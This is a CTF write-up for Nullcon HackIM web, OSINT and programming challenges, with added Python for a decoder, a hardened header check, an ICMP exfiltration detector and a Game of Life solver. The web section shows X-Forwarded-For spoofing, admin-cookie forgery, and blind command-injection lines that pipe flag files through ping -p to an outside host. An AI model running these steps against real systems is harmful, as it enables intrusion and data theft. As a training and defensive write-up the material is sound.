Nullcon HackIM 2017 CTF – Web

Web 1 | 100 Points

Question: Chris Martin wants to go home. Can you help him get there as soon as possible? http://54.152.19.210/web100/

Hints: No hint is given in the question itself, but two hints are provided elsewhere: one as an HTML comment and one in the error messages.

Answer: I found a base64-encoded string “MmI0YjAzN2ZkMWYzMDM3NWU1Y2Q4NzE0NDhiNWI5NWM=” in the page source, inside an HTML comment.

Decoding it gave an MD5 hash, which I googled. The search led to an image containing the username and password: coldplay:paradise.

I entered these in the login form and got an error: “Mismatch in Host table!”, so the server restricts access by IP address. Meanwhile I saw a hint from @nullcon: “There is no place like home”. lol… it’s 127.0.0.1.

I immediately added the header X-Forwarded-For: 127.0.0.1 to the request and got the flag.

Flag: flag{4f9361b0302d4c2f2eb1fc308587dfd6}
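Two things from this challenge are worth seeing in code: the decode step (the comment is base64 of a hex MD5 digest, which is looked up, not decrypted) and why the X-Forwarded-For trick worked. The following is an added Python example, not code from the challenge or from this writeup. The two access checks are hypothetical models: one of a server that trusts the header from anyone, as the challenge behaved, and one that only honours it when the TCP peer is a reverse proxy the operator runs (the trusted_proxies parameter is an assumption).

```python
import base64

# HTML comment found in the page source, as quoted in the writeup above.
COMMENT_B64 = "MmI0YjAzN2ZkMWYzMDM3NWU1Y2Q4NzE0NDhiNWI5NWM="
LOOPBACK = "127.0.0.1"


def decode_comment(b64: str) -> str:
    """Base64-decode the comment. The result is a 32-character hex string,
    i.e. an MD5 digest to look up in a hash database, not ciphertext."""
    return base64.b64decode(b64).decode("ascii")


def vulnerable_is_local(remote_addr: str, headers: dict) -> bool:
    """Hypothetical check modelled on the challenge: it believes X-Forwarded-For
    no matter who sent it, so any client can claim to be loopback."""
    claimed = headers.get("X-Forwarded-For", remote_addr)
    return claimed.split(",")[0].strip() == LOOPBACK


def hardened_is_local(remote_addr: str, headers: dict,
                      trusted_proxies: frozenset = frozenset()) -> bool:
    """Only honour X-Forwarded-For when the socket peer is a reverse proxy we
    operate, and then take the address that proxy appended (the last entry).
    Otherwise the socket address is the one value a remote client cannot forge."""
    xff = headers.get("X-Forwarded-For")
    if xff and remote_addr in trusted_proxies:
        client = xff.split(",")[-1].strip()
    else:
        client = remote_addr
    return client == LOOPBACK


if __name__ == "__main__":
    print(decode_comment(COMMENT_B64))
    spoofed = {"X-Forwarded-For": LOOPBACK}          # header a client added itself
    print("vulnerable:", vulnerable_is_local("203.0.113.5", spoofed))
    print("hardened:  ", hardened_is_local("203.0.113.5", spoofed))
```

The hardened variant is the usual fix: the application never reads proxy headers directly, the reverse proxy is the only component allowed to set them, and the address list is read from the proxy's end rather than the client's.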


Web 2 | 200 Points

Question: There are two kinds of people in this world. One with all the privileges and the others. Can you get the flag by eating some British biscuit?

http://54.152.19.210/web200/

Hints: British Biscuit….Cookie !!!

Answer: I created a user and logged in to the application. It was a limited user, and since the hint pointed at the cookie, we needed to do something with it.

Cookies created by the application:

r – 351e766803d63c7ede8cb1e1c8db5e51c63fd47cff
u – 351e7668030bacc3ecaf25565435d10cc8bd094c49

Both cookies share the prefix “351e766803”. Removing it leaves two MD5 hashes, and looking them up gives a clear picture:

r – d63c7ede8cb1e1c8db5e51c63fd47cff – limited
u – 0bacc3ecaf25565435d10cc8bd094c49 – s4thi5h

I replaced the MD5 part of cookie r with the MD5 of “admin” and got the admin page.

Flag: flag{bb6df1e39bd297a47ed0eeaea9cac7ee}


Web 3 | 300 Points

Question: http://54.89.146.217/

Hints: CMD, Command Injection, I love my Ex. I also love Filterate.

Answer: Some research on Google using the hints led me to “Data Exfiltration via Blind OS Command Injection”.

The target is hardened against netcat, wget and cURL, so the only channel left is ICMP ping. With it we can exfiltrate data inside ICMP echo requests using the -p flag, which lets you specify up to 16 “pad” bytes. This is where we store the data we want to exfiltrate.

These are the payloads I used to retrieve the flags.

cat /home/nullcon/flagpart1.txt | xxd -p -c 16 | while read exfil; do ping -p $exfil -c 1 xx.xx.xx.xx; done

cat /home/nullcon/flagpart2.txt | xxd -p -c 16 | while read exfil; do ping -p $exfil -c 1 xx.xx.xx.xx; done

On our own server we capture the traffic with tcpdump:

tcpdump -A -s0 -i eth0 icmp

Flag: flag{0mgth4tsaniceflag}
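From the defender's side, the tell-tale of this channel is an ICMP echo payload that is a short pattern repeated to fill the packet, which is exactly what ping -p produces, whereas an ordinary ping fills the data with non-repeating bytes. The following is an added Python example, not code from the writeup: it builds constructed echo-request payloads that emulate the -p pad behaviour (the timestamp bytes are made up, and the assumption that a timestamp of 0, 8 or 16 bytes precedes the pattern is handled by trying each offset), detects the repeating unit, and reassembles the exfiltrated bytes across packets. The flag string from this challenge is used as the sample file content.

```python
# Sample data (constructed): the flag from this writeup stands in for the file
# being exfiltrated 16 bytes at a time, as "xxd -p -c 16 | ping -p" does.
FLAG_BYTES = b"flag{0mgth4tsaniceflag}\n"
ICMP_DATA_LEN = 56          # default ping data size on Linux
HEADER_SKIPS = (0, 8, 16)   # candidate timestamp lengths to skip; ping builds differ
# Constructed stand-in for the timestamp ping writes at the start of the data.
FAKE_TIMESTAMP = bytes([0x58, 0x9B, 0x0C, 0x7F, 0x00, 0x03, 0xA1, 0x2E])


def chunks(data: bytes, n: int = 16):
    """Split into <=16-byte pieces, the unit the exfil loop sends per packet."""
    return [data[i:i + n] for i in range(0, len(data), n)]


def build_ping_payload(pad: bytes, data_len: int = ICMP_DATA_LEN) -> bytes:
    """Emulate ping -p: a timestamp, then the pad repeated to fill the data area."""
    body = (pad * (data_len // len(pad) + 1))[: data_len - len(FAKE_TIMESTAMP)]
    return FAKE_TIMESTAMP + body


def default_payload(data_len: int = ICMP_DATA_LEN) -> bytes:
    """Ordinary ping filler: timestamp, then incrementing bytes (no short repeat)."""
    return FAKE_TIMESTAMP + bytes(range(len(FAKE_TIMESTAMP), data_len))


def repeating_unit(data: bytes, max_period: int = 16):
    """Smallest period <= max_period that the whole buffer repeats with, or None.
    Requires at least two full repetitions so short buffers are not flagged."""
    for p in range(1, max_period + 1):
        if len(data) >= 2 * p and all(data[i] == data[i % p] for i in range(len(data))):
            return data[:p]
    return None


def extract_pad(payload: bytes):
    """Return the pad pattern if the echo data looks like ping -p output."""
    for skip in HEADER_SKIPS:
        unit = repeating_unit(payload[skip:])
        if unit:
            return unit
    return None


def reassemble(payloads) -> bytes:
    """Concatenate the pad of every suspicious packet, in capture order."""
    return b"".join(u for u in (extract_pad(p) for p in payloads) if u)


if __name__ == "__main__":
    packets = [build_ping_payload(c) for c in chunks(FLAG_BYTES)]
    for pkt in packets:
        print("suspicious pad:", extract_pad(pkt))
    print("default ping   :", extract_pad(default_payload()))
    print("reassembled    :", reassemble(packets))
```

On a real capture the same logic runs over the ICMP data field of each echo request (after the 8-byte ICMP header); a rule such as "echo data with a repeating unit of 16 bytes or fewer that is not the host's default pattern" is a cheap first filter before looking at the rate and destination of the pings.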


Nullcon HackIM 2017 CTF – OSINT

OSINT 1 | 100 Points

Answer: The hints in the question are “I Serve”, “Clear Water” and “Fingerprint”.

Clear Water is a city in Florida. I wasted the first day in Google Maps, since all the hints they gave seemed related to Google Maps. I thought it might be a latitude/longitude and tried every possibility in Google Maps, with no success.

On the second day I saw this tweet from @upgoingstar. He mentioned infosec online tools and databases.

I tried all the databases, including SHODAN.IO, and that was the place. (Here the hints “I serve” and “What’s my fingerprint” fit together: it must be a server running in Clear Water.)

Shodan.io supports searching by city. It lists all the servers running in “clear water”, and luckily only one server was running in Clear Water city. I checked its details and got the fingerprint.

Link: https://www.shodan.io/host/24.96.78.131

Flag: flag{ee:06:bb:c1:48:bc:64:bf:69:d3:ff:6f:b0:89:6a:84}


OSINT 2 | 200 Points

Hints: “7033”, “I have a request”

We have one website and an image. I started with the image content. Googling the number 7033 gave RFC 7033, the WebFinger protocol. The RFC lists a default request (hint: “I have a request”). I copied the request and tried it on the target website. Boom, I got some information.

SSDEEP(523bd1e47b08cfd4d92cddcbff8e541d)
flag{ssdeep}

Answer: Here I trusted Google once again. I googled the hash and got “ViCheck.ca – Malware Hash Index”.

It is a malware hash database. I searched the hash “523bd1e47b08cfd4d92cddcbff8e541d” and got the ssdeep flag.

Flag: flag{3072:uFvAPdnvdoz91j/q2p4N1m1QmKoEe2TE4lvrNh:uFvAPdnvdoz91rq2p4rm1QdoEe2TE4l/}


Nullcon HackIM 2016 CTF – Programming

Programming 1 | 200 Points

So you reached Delhi and now the noise in your head is not allowing you to think rationally. The Noise in your head has its Origin in your Stomach. And this is a big hunger. You can finish one or probably 2 Tandoori Chicken. So where can you get the best Tandoori Chicken in Delhi? This place tweeted last week that the Tandoori Chicken it serves is like never B4. You got its twitter handle?

Answer: The hints in the question are “Tandoori Chicken in Delhi”, “Twitter” and “Tandoori Chicken it serves like never before”.

I went straight to Twitter and searched for words like tandoori chicken and Delhi, and found @AnyaHotels and the same line.

Flag: @anyahotels


Programming 2 | 300 Points

Your simple good Deeds can save you but your GREED can kill you. This has happened before. This greedy person lived a miserable life just for the greed of gold and lust. You must know him, once you know him, you must reach his capital and next clues will be given by his famous EX-Body Guard. This file consists of a few paragraphs. Each paragraph singles out one Alphabet. Scrambling those Alphabets will help you to know the country of this Ruler. Who was this Ruler?

Text File Content: (http://ctf.nullcon.net/prog/TheLastRuler.txt)

Answer: We need to single out one letter from each paragraph. At first I did not know what “singles out” meant; eventually I understood that we have to pick the most frequently used letter from each paragraph. That gave me the letters “aliby”; rearranging them gives the country “Libya”, and then Google!!!!

Flag: Muammar Gaddafi
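The procedure described above (most frequent letter per paragraph, then unscramble the collected letters against candidate country names) as an added Python example; this is not the writeup's code, and since the challenge text file is not reproduced here, the five paragraphs below are constructed so that their dominant letters are a, l, i, b, y. The candidate list is also an assumption.

```python
from collections import Counter

# Constructed sample: five paragraphs whose most frequent letters spell "aliby".
SAMPLE_TEXT = """A man, a plan, a canal: Panama.

Lily will fill all tall walls well.

Ibis in Illinois: icing is it.

Bob's big blue bubble bobbed by.

Yay, yummy yellow yoyo, says Yvonne yearly."""

CANDIDATE_COUNTRIES = ["Libya", "Italy", "Mali", "Albania"]  # assumed candidate list


def dominant_letter(paragraph: str) -> str:
    """Most frequent alphabetic character, case-folded; punctuation and
    whitespace are ignored. On a tie the first letter seen wins."""
    counts = Counter(ch for ch in paragraph.lower() if ch.isalpha())
    if not counts:
        raise ValueError("paragraph contains no letters")
    return counts.most_common(1)[0][0]


def split_paragraphs(text: str):
    """Paragraphs are separated by blank lines; empty blocks are dropped."""
    return [p for p in text.split("\n\n") if p.strip()]


def letters_from_paragraphs(text: str) -> str:
    return "".join(dominant_letter(p) for p in split_paragraphs(text))


def unscramble(letters: str, candidates) -> list:
    """Anagram match: a candidate qualifies if it uses exactly these letters."""
    key = sorted(letters.lower())
    return [c for c in candidates if sorted(c.lower()) == key]


if __name__ == "__main__":
    letters = letters_from_paragraphs(SAMPLE_TEXT)
    print("collected letters:", letters)
    print("matching countries:", unscramble(letters, CANDIDATE_COUNTRIES))
```

Ties are the practical trap in this puzzle: if two letters share the top count, Counter keeps whichever appeared first, so for a real input it is worth printing the top two counts per paragraph and checking that the winner is unambiguous.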

Programming 3 | 300 Points

Still Hungry and unsatisfied, you are looking for more. Some more, unique unheard dishes. Then you can find one to make it yourself. It's his Dish. He has his own website which he describes as “a social home for each of our passions”. The link to his website is on his Google+ page. What's the name of his site? By the way he loves and hogs on “Onion Kheer”. Have you heard of “Onion Kheer”?

Answer: I simply searched Google for the sentence “a social home for each of our passions”; the first result is the flag :P

Flag: affimity.com

Programming 4 | 400 Points

One of the NullCon videos talked about a marvellous Russian Gift. The Video was uploaded in [May of 2015]. What is the ID of that YouTube video?

Answer: Hint: “YouTube ID”. I went straight to the nullcon YouTube channel, tried the IDs of all the videos from 8 months before, and GOT THE FLAG!!!!!!

Flag: a4_PvN_A1ts

Programming 5 | 500 Points

Don’t blink your Eyes, you might miss it. But the fatigue and exhaustion rule out any logic, any will to stay awake. What you need now is a slumber. A cat nap will not do. 1 is LIFE and 0 is DEAD. In this GAME OF LIFE sleep is as important as food. So… catch some sleep. But Remember… In the world of a 10×10 matrix, Life exists. If you SLOTH, sleep for 7 Ticks, or 7 Generations, in the Game of Life can you tell what will be the state of the world?

The world – 10×10

0000000000,0000000000,0001111100,0000000100,0000001000,0000010000,0000100000,0001000000,0000000000,000000000

Answer: Hints: “7”, “GAME OF LIFE”

It is a little bit tricky, and I only solved it on the second day. Laying out the binary strings as rows of a grid, I saw that the 1s form the digit 7.

By googling “Game of Life” I found a link to a Game of Life board:

http://pmav.eu/stuff/javascript-game-of-life-v3.1.1/

After drawing the 7 on the board, I ran it seven times, since the question clearly asks for the 7th generation.

I converted the live cells back into binary strings.

Flag: 0000000000,0001100000,0001111010,0000001001,0000001010,0000000000,0000000000,0000000000,0000000000,0000000000
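Rather than clicking through an online board, the 7 generations can be computed directly. The following is an added Python example, not the writeup's code or the linked board's: it parses the comma-separated world exactly as posted (the last row has only nine digits, so short rows are padded with zeros), applies Conway's standard rules on the bounded 10×10 grid (cells beyond the edge count as dead), and renders the 7th generation in the same comma-separated form as the flag. For this particular input the edge never changes the outcome, so the result matches an unbounded board as well.

```python
# Initial world as posted in the challenge (note the nine-digit last row).
WORLD = ("0000000000,0000000000,0001111100,0000000100,0000001000,"
         "0000010000,0000100000,0001000000,0000000000,000000000")
SIZE = 10
GENERATIONS = 7


def parse_world(spec: str, size: int = SIZE):
    """Rows are comma-separated bit strings; short rows and missing rows are padded with 0."""
    rows = [[int(ch) for ch in row] for row in spec.split(",")]
    grid = [(row + [0] * size)[:size] for row in rows]
    while len(grid) < size:
        grid.append([0] * size)
    return grid


def live_neighbours(grid, r: int, c: int) -> int:
    """Count live cells among the up-to-8 neighbours; off-grid cells are dead."""
    h, w = len(grid), len(grid[0])
    total = 0
    for rr in range(max(0, r - 1), min(h, r + 2)):
        for cc in range(max(0, c - 1), min(w, c + 2)):
            if (rr, cc) != (r, c):
                total += grid[rr][cc]
    return total


def step(grid):
    """One Conway generation: live with 2 or 3 neighbours survives, dead with exactly 3 is born."""
    h, w = len(grid), len(grid[0])
    nxt = [[0] * w for _ in range(h)]
    for r in range(h):
        for c in range(w):
            n = live_neighbours(grid, r, c)
            nxt[r][c] = 1 if n == 3 or (n == 2 and grid[r][c]) else 0
    return nxt


def render(grid) -> str:
    return ",".join("".join(str(x) for x in row) for row in grid)


def population(grid) -> int:
    return sum(map(sum, grid))


def evolve(spec: str, generations: int = GENERATIONS) -> str:
    grid = parse_world(spec)
    for _ in range(generations):
        grid = step(grid)
    return render(grid)


if __name__ == "__main__":
    grid = parse_world(WORLD)
    for g in range(GENERATIONS + 1):
        print(f"gen {g}: {population(grid)} live")
        grid = step(grid)
    print(evolve(WORLD))
```

Running it reproduces the flag string above; the population line per generation is a quick sanity check when comparing against a GUI board, where an off-by-one in the number of ticks is the usual mistake.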